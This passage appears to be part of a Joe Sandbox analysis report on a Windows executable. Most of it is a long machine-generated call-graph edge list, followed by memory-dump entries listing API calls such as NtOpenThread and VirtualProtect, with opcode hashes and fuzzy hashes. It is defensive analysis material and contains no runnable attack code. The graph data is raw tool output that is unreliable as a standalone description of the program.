calls 3244->3245 3246 7ff67c75154e 3245->3246 3247 7ff67c751394 2 API calls 3246->3247 3248 7ff67c75155d 3247->3248 3249 7ff67c751394 2 API calls 3248->3249 3250 7ff67c75156c 3249->3250 3251 7ff67c751394 2 API calls 3250->3251 3252 7ff67c75157b 3251->3252 3253 7ff67c751394 2 API calls 3252->3253 3254 7ff67c75158a 3253->3254 3255 7ff67c751394 2 API calls 3254->3255 3256 7ff67c751599 3255->3256 3257 7ff67c751394 2 API calls 3256->3257 3258 7ff67c7515a8 3257->3258 3259 7ff67c751394 2 API calls 3258->3259 3260 7ff67c7515b7 3259->3260 3261 7ff67c7515c6 3260->3261 3262 7ff67c751394 2 API calls 3260->3262 3263 7ff67c751394 2 API calls 3261->3263 3262->3261 3264 7ff67c7515d0 3263->3264 3265 7ff67c7515d5 3264->3265 3266 7ff67c751394 2 API calls 3264->3266 3267 7ff67c751394 2 API calls 3265->3267 3266->3265 3268 7ff67c7515df 3267->3268 3269 7ff67c7515e4 3268->3269 3270 7ff67c751394 2 API calls 3268->3270 3271 7ff67c751394 2 API calls 3269->3271 3270->3269 3272 7ff67c7515f3 3271->3272 3272->2787 3272->2788 3274 7ff67c7514b8 3273->3274 3275 7ff67c751394 2 API calls 3273->3275 3276 7ff67c751394 2 API calls 3274->3276 3275->3274 3277 7ff67c7514c2 3276->3277 3278 7ff67c7514c7 3277->3278 3279 7ff67c751394 2 API calls 3277->3279 3280 7ff67c751394 2 API calls 3278->3280 3279->3278 3281 7ff67c7514d6 3280->3281 3282 7ff67c751394 2 API calls 3281->3282 3283 7ff67c7514e0 3282->3283 3284 7ff67c7514e5 3283->3284 3285 7ff67c751394 2 API calls 3283->3285 3286 7ff67c751394 2 API calls 3284->3286 3285->3284 3287 7ff67c7514ef 3286->3287 3288 7ff67c7514f4 3287->3288 3289 7ff67c751394 2 API calls 3287->3289 3290 7ff67c751394 2 API calls 3288->3290 3289->3288 3291 7ff67c7514fe 3290->3291 3292 7ff67c751503 3291->3292 3293 7ff67c751394 2 API calls 3291->3293 3294 7ff67c751394 2 API calls 3292->3294 3293->3292 3295 7ff67c75150d 3294->3295 3296 7ff67c751394 2 API calls 3295->3296 3297 7ff67c751512 3296->3297 3298 7ff67c751394 2 API calls 3297->3298 3299 7ff67c751521 3298->3299 3300 7ff67c751394 2 API 
calls 3299->3300 3301 7ff67c751530 3300->3301 3302 7ff67c751394 2 API calls 3301->3302 3303 7ff67c75153f 3302->3303 3304 7ff67c751394 2 API calls 3303->3304 3305 7ff67c75154e 3304->3305 3306 7ff67c751394 2 API calls 3305->3306 3307 7ff67c75155d 3306->3307 3308 7ff67c751394 2 API calls 3307->3308 3309 7ff67c75156c 3308->3309 3310 7ff67c751394 2 API calls 3309->3310 3311 7ff67c75157b 3310->3311 3312 7ff67c751394 2 API calls 3311->3312 3313 7ff67c75158a 3312->3313 3314 7ff67c751394 2 API calls 3313->3314 3315 7ff67c751599 3314->3315 3316 7ff67c751394 2 API calls 3315->3316 3317 7ff67c7515a8 3316->3317 3318 7ff67c751394 2 API calls 3317->3318 3319 7ff67c7515b7 3318->3319 3320 7ff67c7515c6 3319->3320 3321 7ff67c751394 2 API calls 3319->3321 3322 7ff67c751394 2 API calls 3320->3322 3321->3320 3323 7ff67c7515d0 3322->3323 3324 7ff67c7515d5 3323->3324 3325 7ff67c751394 2 API calls 3323->3325 3326 7ff67c751394 2 API calls 3324->3326 3325->3324 3327 7ff67c7515df 3326->3327 3328 7ff67c7515e4 3327->3328 3329 7ff67c751394 2 API calls 3327->3329 3330 7ff67c751394 2 API calls 3328->3330 3329->3328 3331 7ff67c7515f3 3330->3331 3331->2797 3332 7ff67c751440 3331->3332 3333 7ff67c751394 2 API calls 3332->3333 3334 7ff67c75144f 3333->3334 3335 7ff67c751394 2 API calls 3334->3335 3336 7ff67c75145e 3335->3336 3337 7ff67c751394 2 API calls 3336->3337 3338 7ff67c75146d 3337->3338 3339 7ff67c751394 2 API calls 3338->3339 3340 7ff67c75147c 3339->3340 3341 7ff67c751394 2 API calls 3340->3341 3342 7ff67c75148b 3341->3342 3343 7ff67c751394 2 API calls 3342->3343 3344 7ff67c75149a 3343->3344 3345 7ff67c751394 2 API calls 3344->3345 3346 7ff67c7514a9 3345->3346 3347 7ff67c7514b8 3346->3347 3348 7ff67c751394 2 API calls 3346->3348 3349 7ff67c751394 2 API calls 3347->3349 3348->3347 3350 7ff67c7514c2 3349->3350 3351 7ff67c7514c7 3350->3351 3352 7ff67c751394 2 API calls 3350->3352 3353 7ff67c751394 2 API calls 3351->3353 3352->3351 3354 7ff67c7514d6 3353->3354 3355 7ff67c751394 2 API calls 
3354->3355 3356 7ff67c7514e0 3355->3356 3357 7ff67c7514e5 3356->3357 3358 7ff67c751394 2 API calls 3356->3358 3359 7ff67c751394 2 API calls 3357->3359 3358->3357 3360 7ff67c7514ef 3359->3360 3361 7ff67c7514f4 3360->3361 3362 7ff67c751394 2 API calls 3360->3362 3363 7ff67c751394 2 API calls 3361->3363 3362->3361 3364 7ff67c7514fe 3363->3364 3365 7ff67c751503 3364->3365 3366 7ff67c751394 2 API calls 3364->3366 3367 7ff67c751394 2 API calls 3365->3367 3366->3365 3368 7ff67c75150d 3367->3368 3369 7ff67c751394 2 API calls 3368->3369 3370 7ff67c751512 3369->3370 3371 7ff67c751394 2 API calls 3370->3371 3372 7ff67c751521 3371->3372 3373 7ff67c751394 2 API calls 3372->3373 3374 7ff67c751530 3373->3374 3375 7ff67c751394 2 API calls 3374->3375 3376 7ff67c75153f 3375->3376 3377 7ff67c751394 2 API calls 3376->3377 3378 7ff67c75154e 3377->3378 3379 7ff67c751394 2 API calls 3378->3379 3380 7ff67c75155d 3379->3380 3381 7ff67c751394 2 API calls 3380->3381 3382 7ff67c75156c 3381->3382 3383 7ff67c751394 2 API calls 3382->3383 3384 7ff67c75157b 3383->3384 3385 7ff67c751394 2 API calls 3384->3385 3386 7ff67c75158a 3385->3386 3387 7ff67c751394 2 API calls 3386->3387 3388 7ff67c751599 3387->3388 3389 7ff67c751394 2 API calls 3388->3389 3390 7ff67c7515a8 3389->3390 3391 7ff67c751394 2 API calls 3390->3391 3392 7ff67c7515b7 3391->3392 3393 7ff67c7515c6 3392->3393 3394 7ff67c751394 2 API calls 3392->3394 3395 7ff67c751394 2 API calls 3393->3395 3394->3393 3396 7ff67c7515d0 3395->3396 3397 7ff67c7515d5 3396->3397 3398 7ff67c751394 2 API calls 3396->3398 3399 7ff67c751394 2 API calls 3397->3399 3398->3397 3400 7ff67c7515df 3399->3400 3401 7ff67c7515e4 3400->3401 3402 7ff67c751394 2 API calls 3400->3402 3403 7ff67c751394 2 API calls 3401->3403 3402->3401 3404 7ff67c7515f3 3403->3404 3404->2797 3404->2810 3406 7ff67c7535c1 memset 3405->3406 3415 7ff67c7533c3 3405->3415 3407 7ff67c7535e6 3406->3407 3409 7ff67c75362b wcscpy wcscat wcslen 3407->3409 3408 7ff67c75343a memset 3408->3415 3410 
7ff67c751422 2 API calls 3409->3410 3412 7ff67c753728 3410->3412 3411 7ff67c753493 wcscpy wcscat wcslen 3690 7ff67c751422 3411->3690 3414 7ff67c753767 3412->3414 3767 7ff67c751431 3412->3767 3421 7ff67c7514c7 3414->3421 3415->3406 3415->3408 3415->3411 3418 7ff67c75145e 2 API calls 3415->3418 3420 7ff67c753579 3415->3420 3418->3415 3419 7ff67c75145e 2 API calls 3419->3414 3420->3406 3422 7ff67c751394 2 API calls 3421->3422 3423 7ff67c7514d6 3422->3423 3424 7ff67c751394 2 API calls 3423->3424 3425 7ff67c7514e0 3424->3425 3426 7ff67c7514e5 3425->3426 3427 7ff67c751394 2 API calls 3425->3427 3428 7ff67c751394 2 API calls 3426->3428 3427->3426 3429 7ff67c7514ef 3428->3429 3430 7ff67c7514f4 3429->3430 3431 7ff67c751394 2 API calls 3429->3431 3432 7ff67c751394 2 API calls 3430->3432 3431->3430 3433 7ff67c7514fe 3432->3433 3434 7ff67c751503 3433->3434 3435 7ff67c751394 2 API calls 3433->3435 3436 7ff67c751394 2 API calls 3434->3436 3435->3434 3437 7ff67c75150d 3436->3437 3438 7ff67c751394 2 API calls 3437->3438 3439 7ff67c751512 3438->3439 3440 7ff67c751394 2 API calls 3439->3440 3441 7ff67c751521 3440->3441 3442 7ff67c751394 2 API calls 3441->3442 3443 7ff67c751530 3442->3443 3444 7ff67c751394 2 API calls 3443->3444 3445 7ff67c75153f 3444->3445 3446 7ff67c751394 2 API calls 3445->3446 3447 7ff67c75154e 3446->3447 3448 7ff67c751394 2 API calls 3447->3448 3449 7ff67c75155d 3448->3449 3450 7ff67c751394 2 API calls 3449->3450 3451 7ff67c75156c 3450->3451 3452 7ff67c751394 2 API calls 3451->3452 3453 7ff67c75157b 3452->3453 3454 7ff67c751394 2 API calls 3453->3454 3455 7ff67c75158a 3454->3455 3456 7ff67c751394 2 API calls 3455->3456 3457 7ff67c751599 3456->3457 3458 7ff67c751394 2 API calls 3457->3458 3459 7ff67c7515a8 3458->3459 3460 7ff67c751394 2 API calls 3459->3460 3461 7ff67c7515b7 3460->3461 3462 7ff67c7515c6 3461->3462 3463 7ff67c751394 2 API calls 3461->3463 3464 7ff67c751394 2 API calls 3462->3464 3463->3462 3465 7ff67c7515d0 3464->3465 3466 7ff67c7515d5 3465->3466 
3467 7ff67c751394 2 API calls 3465->3467 3468 7ff67c751394 2 API calls 3466->3468 3467->3466 3469 7ff67c7515df 3468->3469 3470 7ff67c7515e4 3469->3470 3471 7ff67c751394 2 API calls 3469->3471 3472 7ff67c751394 2 API calls 3470->3472 3471->3470 3473 7ff67c7515f3 3472->3473 3473->2823 3475 7ff67c752f88 3474->3475 3476 7ff67c7514a9 2 API calls 3475->3476 3477 7ff67c752fd0 3476->3477 3477->2798 3479 7ff67c752690 10 API calls 3478->3479 3480 7ff67c75391e 3479->3480 3481 7ff67c753b21 3480->3481 3482 7ff67c7514a9 2 API calls 3480->3482 3481->2807 3483 7ff67c753967 3482->3483 3484 7ff67c753b28 3483->3484 3842 7ff67c7514b8 3483->3842 4095 7ff67c7515c6 3484->4095 3487 7ff67c753a87 memset 3906 7ff67c75148b 3487->3906 3489 7ff67c7514b8 2 API calls 3491 7ff67c75398f 3489->3491 3491->3487 3491->3489 3899 7ff67c7515d5 3491->3899 3495 7ff67c7514b8 2 API calls 3496 7ff67c753b07 3495->3496 3496->3484 3497 7ff67c753b0b 3496->3497 4030 7ff67c75147c 3497->4030 3500 7ff67c75145e 2 API calls 3500->3481 3502 7ff67c758410 malloc 3501->3502 3503 7ff67c7513b8 3502->3503 3504 7ff67c7513c6 NtOpenThread 3503->3504 3504->2866 3506 7ff67c75266f memset 3505->3506 3506->3035 3575 7ff67c75155d 3507->3575 3509 7ff67c7527f4 3510 7ff67c7514c7 2 API calls 3509->3510 3513 7ff67c752816 3510->3513 3512 7ff67c752785 wcsncmp 3600 7ff67c7514e5 3512->3600 3515 7ff67c751503 2 API calls 3513->3515 3516 7ff67c75283d 3515->3516 3518 7ff67c752847 memset 3516->3518 3517 7ff67c752d27 3519 7ff67c752877 3518->3519 3520 7ff67c7528bc wcscpy wcscat wcslen 3519->3520 3521 7ff67c75291a 3520->3521 3522 7ff67c7528ee wcslen 3520->3522 3523 7ff67c752967 wcslen 3521->3523 3526 7ff67c752985 3521->3526 3522->3521 3523->3526 3524 7ff67c7529d9 wcslen 3525 7ff67c7514a9 2 API calls 3524->3525 3527 7ff67c752a73 3525->3527 3526->3517 3526->3524 3528 7ff67c7514a9 2 API calls 3527->3528 3529 7ff67c752bd2 3528->3529 3647 7ff67c7514f4 3529->3647 3532 7ff67c7514c7 2 API calls 3533 7ff67c752c99 3532->3533 3534 7ff67c7514c7 2 API calls 
3533->3534 3535 7ff67c752cb1 3534->3535 3536 7ff67c75145e 2 API calls 3535->3536 3537 7ff67c752cbb 3536->3537 3538 7ff67c75145e 2 API calls 3537->3538 3539 7ff67c752cc5 3538->3539 3539->3029 3541 7ff67c751394 2 API calls 3540->3541 3542 7ff67c751521 3541->3542 3543 7ff67c751394 2 API calls 3542->3543 3544 7ff67c751530 3543->3544 3545 7ff67c751394 2 API calls 3544->3545 3546 7ff67c75153f 3545->3546 3547 7ff67c751394 2 API calls 3546->3547 3548 7ff67c75154e 3547->3548 3549 7ff67c751394 2 API calls 3548->3549 3550 7ff67c75155d 3549->3550 3551 7ff67c751394 2 API calls 3550->3551 3552 7ff67c75156c 3551->3552 3553 7ff67c751394 2 API calls 3552->3553 3554 7ff67c75157b 3553->3554 3555 7ff67c751394 2 API calls 3554->3555 3556 7ff67c75158a 3555->3556 3557 7ff67c751394 2 API calls 3556->3557 3558 7ff67c751599 3557->3558 3559 7ff67c751394 2 API calls 3558->3559 3560 7ff67c7515a8 3559->3560 3561 7ff67c751394 2 API calls 3560->3561 3562 7ff67c7515b7 3561->3562 3563 7ff67c7515c6 3562->3563 3564 7ff67c751394 2 API calls 3562->3564 3565 7ff67c751394 2 API calls 3563->3565 3564->3563 3566 7ff67c7515d0 3565->3566 3567 7ff67c7515d5 3566->3567 3568 7ff67c751394 2 API calls 3566->3568 3569 7ff67c751394 2 API calls 3567->3569 3568->3567 3570 7ff67c7515df 3569->3570 3571 7ff67c7515e4 3570->3571 3572 7ff67c751394 2 API calls 3570->3572 3573 7ff67c751394 2 API calls 3571->3573 3572->3571 3574 7ff67c7515f3 3573->3574 3574->3031 3576 7ff67c751394 2 API calls 3575->3576 3577 7ff67c75156c 3576->3577 3578 7ff67c751394 2 API calls 3577->3578 3579 7ff67c75157b 3578->3579 3580 7ff67c751394 2 API calls 3579->3580 3581 7ff67c75158a 3580->3581 3582 7ff67c751394 2 API calls 3581->3582 3583 7ff67c751599 3582->3583 3584 7ff67c751394 2 API calls 3583->3584 3585 7ff67c7515a8 3584->3585 3586 7ff67c751394 2 API calls 3585->3586 3587 7ff67c7515b7 3586->3587 3588 7ff67c7515c6 3587->3588 3589 7ff67c751394 2 API calls 3587->3589 3590 7ff67c751394 2 API calls 3588->3590 3589->3588 3591 7ff67c7515d0 3590->3591 
3592 7ff67c7515d5 3591->3592 3593 7ff67c751394 2 API calls 3591->3593 3594 7ff67c751394 2 API calls 3592->3594 3593->3592 3595 7ff67c7515df 3594->3595 3596 7ff67c7515e4 3595->3596 3597 7ff67c751394 2 API calls 3595->3597 3598 7ff67c751394 2 API calls 3596->3598 3597->3596 3599 7ff67c7515f3 3598->3599 3599->3509 3599->3512 3599->3517 3601 7ff67c751394 2 API calls 3600->3601 3602 7ff67c7514ef 3601->3602 3603 7ff67c7514f4 3602->3603 3604 7ff67c751394 2 API calls 3602->3604 3605 7ff67c751394 2 API calls 3603->3605 3604->3603 3606 7ff67c7514fe 3605->3606 3607 7ff67c751503 3606->3607 3608 7ff67c751394 2 API calls 3606->3608 3609 7ff67c751394 2 API calls 3607->3609 3608->3607 3610 7ff67c75150d 3609->3610 3611 7ff67c751394 2 API calls 3610->3611 3612 7ff67c751512 3611->3612 3613 7ff67c751394 2 API calls 3612->3613 3614 7ff67c751521 3613->3614 3615 7ff67c751394 2 API calls 3614->3615 3616 7ff67c751530 3615->3616 3617 7ff67c751394 2 API calls 3616->3617 3618 7ff67c75153f 3617->3618 3619 7ff67c751394 2 API calls 3618->3619 3620 7ff67c75154e 3619->3620 3621 7ff67c751394 2 API calls 3620->3621 3622 7ff67c75155d 3621->3622 3623 7ff67c751394 2 API calls 3622->3623 3624 7ff67c75156c 3623->3624 3625 7ff67c751394 2 API calls 3624->3625 3626 7ff67c75157b 3625->3626 3627 7ff67c751394 2 API calls 3626->3627 3628 7ff67c75158a 3627->3628 3629 7ff67c751394 2 API calls 3628->3629 3630 7ff67c751599 3629->3630 3631 7ff67c751394 2 API calls 3630->3631 3632 7ff67c7515a8 3631->3632 3633 7ff67c751394 2 API calls 3632->3633 3634 7ff67c7515b7 3633->3634 3635 7ff67c7515c6 3634->3635 3636 7ff67c751394 2 API calls 3634->3636 3637 7ff67c751394 2 API calls 3635->3637 3636->3635 3638 7ff67c7515d0 3637->3638 3639 7ff67c7515d5 3638->3639 3640 7ff67c751394 2 API calls 3638->3640 3641 7ff67c751394 2 API calls 3639->3641 3640->3639 3642 7ff67c7515df 3641->3642 3643 7ff67c7515e4 3642->3643 3644 7ff67c751394 2 API calls 3642->3644 3645 7ff67c751394 2 API calls 3643->3645 3644->3643 3646 7ff67c7515f3 3645->3646 
3646->3509 3648 7ff67c751394 2 API calls 3647->3648 3649 7ff67c7514fe 3648->3649 3650 7ff67c751503 3649->3650 3651 7ff67c751394 2 API calls 3649->3651 3652 7ff67c751394 2 API calls 3650->3652 3651->3650 3653 7ff67c75150d 3652->3653 3654 7ff67c751394 2 API calls 3653->3654 3655 7ff67c751512 3654->3655 3656 7ff67c751394 2 API calls 3655->3656 3657 7ff67c751521 3656->3657 3658 7ff67c751394 2 API calls 3657->3658 3659 7ff67c751530 3658->3659 3660 7ff67c751394 2 API calls 3659->3660 3661 7ff67c75153f 3660->3661 3662 7ff67c751394 2 API calls 3661->3662 3663 7ff67c75154e 3662->3663 3664 7ff67c751394 2 API calls 3663->3664 3665 7ff67c75155d 3664->3665 3666 7ff67c751394 2 API calls 3665->3666 3667 7ff67c75156c 3666->3667 3668 7ff67c751394 2 API calls 3667->3668 3669 7ff67c75157b 3668->3669 3670 7ff67c751394 2 API calls 3669->3670 3671 7ff67c75158a 3670->3671 3672 7ff67c751394 2 API calls 3671->3672 3673 7ff67c751599 3672->3673 3674 7ff67c751394 2 API calls 3673->3674 3675 7ff67c7515a8 3674->3675 3676 7ff67c751394 2 API calls 3675->3676 3677 7ff67c7515b7 3676->3677 3678 7ff67c7515c6 3677->3678 3679 7ff67c751394 2 API calls 3677->3679 3680 7ff67c751394 2 API calls 3678->3680 3679->3678 3681 7ff67c7515d0 3680->3681 3682 7ff67c7515d5 3681->3682 3683 7ff67c751394 2 API calls 3681->3683 3684 7ff67c751394 2 API calls 3682->3684 3683->3682 3685 7ff67c7515df 3684->3685 3686 7ff67c7515e4 3685->3686 3687 7ff67c751394 2 API calls 3685->3687 3688 7ff67c751394 2 API calls 3686->3688 3687->3686 3689 7ff67c7515f3 3688->3689 3689->3532 3691 7ff67c751394 2 API calls 3690->3691 3692 7ff67c751431 3691->3692 3693 7ff67c751394 2 API calls 3692->3693 3694 7ff67c751440 3693->3694 3695 7ff67c751394 2 API calls 3694->3695 3696 7ff67c75144f 3695->3696 3697 7ff67c751394 2 API calls 3696->3697 3698 7ff67c75145e 3697->3698 3699 7ff67c751394 2 API calls 3698->3699 3700 7ff67c75146d 3699->3700 3701 7ff67c751394 2 API calls 3700->3701 3702 7ff67c75147c 3701->3702 3703 7ff67c751394 2 API calls 3702->3703 
3704 7ff67c75148b 3703->3704 3705 7ff67c751394 2 API calls 3704->3705 3706 7ff67c75149a 3705->3706 3707 7ff67c751394 2 API calls 3706->3707 3708 7ff67c7514a9 3707->3708 3709 7ff67c7514b8 3708->3709 3710 7ff67c751394 2 API calls 3708->3710 3711 7ff67c751394 2 API calls 3709->3711 3710->3709 3712 7ff67c7514c2 3711->3712 3713 7ff67c7514c7 3712->3713 3714 7ff67c751394 2 API calls 3712->3714 3715 7ff67c751394 2 API calls 3713->3715 3714->3713 3716 7ff67c7514d6 3715->3716 3717 7ff67c751394 2 API calls 3716->3717 3718 7ff67c7514e0 3717->3718 3719 7ff67c7514e5 3718->3719 3720 7ff67c751394 2 API calls 3718->3720 3721 7ff67c751394 2 API calls 3719->3721 3720->3719 3722 7ff67c7514ef 3721->3722 3723 7ff67c7514f4 3722->3723 3724 7ff67c751394 2 API calls 3722->3724 3725 7ff67c751394 2 API calls 3723->3725 3724->3723 3726 7ff67c7514fe 3725->3726 3727 7ff67c751503 3726->3727 3728 7ff67c751394 2 API calls 3726->3728 3729 7ff67c751394 2 API calls 3727->3729 3728->3727 3730 7ff67c75150d 3729->3730 3731 7ff67c751394 2 API calls 3730->3731 3732 7ff67c751512 3731->3732 3733 7ff67c751394 2 API calls 3732->3733 3734 7ff67c751521 3733->3734 3735 7ff67c751394 2 API calls 3734->3735 3736 7ff67c751530 3735->3736 3737 7ff67c751394 2 API calls 3736->3737 3738 7ff67c75153f 3737->3738 3739 7ff67c751394 2 API calls 3738->3739 3740 7ff67c75154e 3739->3740 3741 7ff67c751394 2 API calls 3740->3741 3742 7ff67c75155d 3741->3742 3743 7ff67c751394 2 API calls 3742->3743 3744 7ff67c75156c 3743->3744 3745 7ff67c751394 2 API calls 3744->3745 3746 7ff67c75157b 3745->3746 3747 7ff67c751394 2 API calls 3746->3747 3748 7ff67c75158a 3747->3748 3749 7ff67c751394 2 API calls 3748->3749 3750 7ff67c751599 3749->3750 3751 7ff67c751394 2 API calls 3750->3751 3752 7ff67c7515a8 3751->3752 3753 7ff67c751394 2 API calls 3752->3753 3754 7ff67c7515b7 3753->3754 3755 7ff67c7515c6 3754->3755 3756 7ff67c751394 2 API calls 3754->3756 3757 7ff67c751394 2 API calls 3755->3757 3756->3755 3758 7ff67c7515d0 3757->3758 3759 
7ff67c7515d5 3758->3759 3760 7ff67c751394 2 API calls 3758->3760 3761 7ff67c751394 2 API calls 3759->3761 3760->3759 3762 7ff67c7515df 3761->3762 3763 7ff67c7515e4 3762->3763 3764 7ff67c751394 2 API calls 3762->3764 3765 7ff67c751394 2 API calls 3763->3765 3764->3763 3766 7ff67c7515f3 3765->3766 3766->3415 3768 7ff67c751394 2 API calls 3767->3768 3769 7ff67c751440 3768->3769 3770 7ff67c751394 2 API calls 3769->3770 3771 7ff67c75144f 3770->3771 3772 7ff67c751394 2 API calls 3771->3772 3773 7ff67c75145e 3772->3773 3774 7ff67c751394 2 API calls 3773->3774 3775 7ff67c75146d 3774->3775 3776 7ff67c751394 2 API calls 3775->3776 3777 7ff67c75147c 3776->3777 3778 7ff67c751394 2 API calls 3777->3778 3779 7ff67c75148b 3778->3779 3780 7ff67c751394 2 API calls 3779->3780 3781 7ff67c75149a 3780->3781 3782 7ff67c751394 2 API calls 3781->3782 3783 7ff67c7514a9 3782->3783 3784 7ff67c7514b8 3783->3784 3785 7ff67c751394 2 API calls 3783->3785 3786 7ff67c751394 2 API calls 3784->3786 3785->3784 3787 7ff67c7514c2 3786->3787 3788 7ff67c7514c7 3787->3788 3789 7ff67c751394 2 API calls 3787->3789 3790 7ff67c751394 2 API calls 3788->3790 3789->3788 3791 7ff67c7514d6 3790->3791 3792 7ff67c751394 2 API calls 3791->3792 3793 7ff67c7514e0 3792->3793 3794 7ff67c7514e5 3793->3794 3795 7ff67c751394 2 API calls 3793->3795 3796 7ff67c751394 2 API calls 3794->3796 3795->3794 3797 7ff67c7514ef 3796->3797 3798 7ff67c7514f4 3797->3798 3799 7ff67c751394 2 API calls 3797->3799 3800 7ff67c751394 2 API calls 3798->3800 3799->3798 3801 7ff67c7514fe 3800->3801 3802 7ff67c751503 3801->3802 3803 7ff67c751394 2 API calls 3801->3803 3804 7ff67c751394 2 API calls 3802->3804 3803->3802 3805 7ff67c75150d 3804->3805 3806 7ff67c751394 2 API calls 3805->3806 3807 7ff67c751512 3806->3807 3808 7ff67c751394 2 API calls 3807->3808 3809 7ff67c751521 3808->3809 3810 7ff67c751394 2 API calls 3809->3810 3811 7ff67c751530 3810->3811 3812 7ff67c751394 2 API calls 3811->3812 3813 7ff67c75153f 3812->3813 3814 7ff67c751394 2 API 
control_flow_graph (continued): edge list of the Joe Sandbox IDA plugin call graph, reduced here to the node and API information that survives extraction. Repeated chains of nodes 7ff67c75148b through 7ff67c7515f3, each marked "7ff67c751394 2 API calls", return to nodes 3419, 3481, 3484, 3491, 3495 and 3500. Other paths: 7ff67c751394 -> 7ff67c758410 -> 7ff67c75842e -> 7ff67c7513b8 -> 7ff67c7513c6 NtOpenThread, with 7ff67c758503 -> 7ff67c75851f malloc; 7ff67c751800 -> 7ff67c751812 -> 7ff67c751835 fprintf; 7ff67c751000 -> 7ff67c75108b __set_app_type -> 7ff67c7510b6 -> 7ff67c751e00 -> 7ff67c7589a0 __setusermatherr; 7ff67c752320 strlen; 7ff67c751f47 -> 7ff67c751e67 signal -> 7ff67c751e7c -> 7ff67c751e82 signal; 7ff67c751ab3 / 7ff67c751a70 -> 7ff67c75199e -> 7ff67c7519e9 VirtualProtect, and 7ff67c751b36 -> 7ff67c751ba0 (4 API calls); 7ff67c75216f -> 7ff67c752178 InitializeCriticalSection; 7ff67c751fd0 -> 7ff67c751ffd EnterCriticalSection LeaveCriticalSection; 7ff67c752050 -> 7ff67c75205e EnterCriticalSection -> 7ff67c752079 -> 7ff67c7520bd free -> 7ff67c7520c2 LeaveCriticalSection; 7ff67c751e10 -> 7ff67c751e2f -> 7ff67c751ecc -> 7ff67c751ed3 signal, 7ff67c751ee4 -> 7ff67c751eea signal, 7ff67c751e55 -> 7ff67c751f12 signal. Remaining edge numbering omitted.

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                      • String ID:
                                                      • API String ID: 2643109117-0
                                                      • Opcode ID: 6280596cb761b5b6b7eb17237f18733a4a3115df363d340f4ddf780b65251a53
                                                      • Instruction ID: cae62184bb99cff1592ed0bdeea89f71ee98bf70d4f5ce1a5607d952bba28670
                                                      • Opcode Fuzzy Hash: 6280596cb761b5b6b7eb17237f18733a4a3115df363d340f4ddf780b65251a53
                                                      • Instruction Fuzzy Hash: C2510537E39A4686FB519B26F9503B927A0BF48791F549435C90DD73A2DF3DA8C28340

                                                      Control-flow Graph

                                                      APIs
                                                      • NtOpenThread.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67C751156), ref: 00007FF67C7513F7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: OpenThread
                                                      • String ID:
                                                      • API String ID: 3092547327-0
                                                      • Opcode ID: 5448f1e04505633c8b83ac876f5ebd2ce998eb501d9696bc89039fdec386beb0
                                                      • Instruction ID: afd7862353eafa1924b253a068171aad6ae1081099a611cb3d3b981449a425cc
                                                      • Opcode Fuzzy Hash: 5448f1e04505633c8b83ac876f5ebd2ce998eb501d9696bc89039fdec386beb0
                                                      • Instruction Fuzzy Hash: ADF07472928B4686D714DB51F85153A77A0FB88780B405839EAAC83725EF3CE1908B84
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462896821.00007FF67C751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67C750000, based on PE: true
                                                      • Associated: 00000000.00000002.1462706908.00007FF67C750000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463067690.00007FF67C759000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1463673017.00007FF67C75B000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464132051.00007FF67C75C000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464694682.00007FF67C9D2000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1464723092.00007FF67C9D4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff67c750000_4o8Tgrb384.jbxd
                                                      Similarity
                                                      • API ID: wcslen$memset$wcscat$wcscpy$_wcsnicmp$memcpy$_wcsicmp
                                                      • String ID: $7%2h
                                                      • API String ID: 3604702941-2135741529
                                                      • Opcode ID: 4edad3bf300135444ca33abc2bc11799258ef6cf3568e0bfdfaab273d99e8052
                                                      • Instruction ID: d39cc9bc64bd8f69125c1e02f6d63624755fb5454db34e28de5d95fa0d64143d
                                                      • Opcode Fuzzy Hash: 4edad3bf300135444ca33abc2bc11799258ef6cf3568e0bfdfaab273d99e8052
